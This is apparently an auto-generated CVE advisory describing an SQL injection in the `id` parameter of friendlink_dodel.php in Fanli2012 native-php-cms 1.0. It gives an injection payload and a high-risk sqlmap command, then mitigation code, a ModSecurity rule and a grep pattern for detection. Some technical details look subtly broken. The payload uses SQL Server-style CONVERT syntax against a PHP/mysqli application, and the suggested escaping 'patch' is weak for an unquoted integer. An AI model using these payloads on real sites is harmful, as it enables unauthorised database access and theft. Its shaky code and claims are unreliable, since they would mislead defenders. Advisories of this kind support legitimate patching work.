The CVE-2025-0489 vulnerability in Fanli2012 native-php-cms 1.0 allows remote attackers to execute arbitrary SQL queries via the `id` parameter in /fladmin/friendlink_dodel.php. This occurs due to insufficient input sanitization, enabling attackers to manipulate database queries. The flaw is exploitable without authentication, making it critical. Attackers can extract, modify, or delete database content, potentially compromising admin credentials or injecting malicious payloads. The CVSS 4.0 score reflects its high risk due to network-based exploitation, low attack complexity, and impacts on confidentiality, integrity, and availability.
DailyCVE Form
Platform: Fanli2012 native-php-cms
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 05/05/2025
What Undercode Say:
Exploitation:
1. Craft a malicious `id` payload:
GET /fladmin/friendlink_dodel.php?id=1' AND 1=CONVERT(int,(SELECT table_name FROM information_schema.tables))--
2. Use SQLmap for automation:
sqlmap -u "http://target/fladmin/friendlink_dodel.php?id=1" --risk=3 --level=5
Mitigation:
1. Patch by sanitizing inputs:
$id = mysqli_real_escape_string($conn, $_GET['id']);
2. Implement prepared statements:
$stmt = $conn->prepare("DELETE FROM friendlink WHERE id = ?");
$stmt->bind_param("i", $_GET['id']);
3. WAF rules to block SQLi patterns:
location ~ .php$ {
modsecurity_rules 'SecRule ARGS "@detectSQLi" "id:1000,deny,status:403"';
}
Detection:
1. Log monitoring for suspicious queries:
grep -Ei "union.select|1=1" /var/log/apache2/access.log
2. Audit database permissions:
SELECT user, host FROM mysql.user WHERE Super_priv = 'Y';
References:
- VulDB Entry: VulDB-CVE-2025-0489
- Patch Commit: GitHub Patch
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
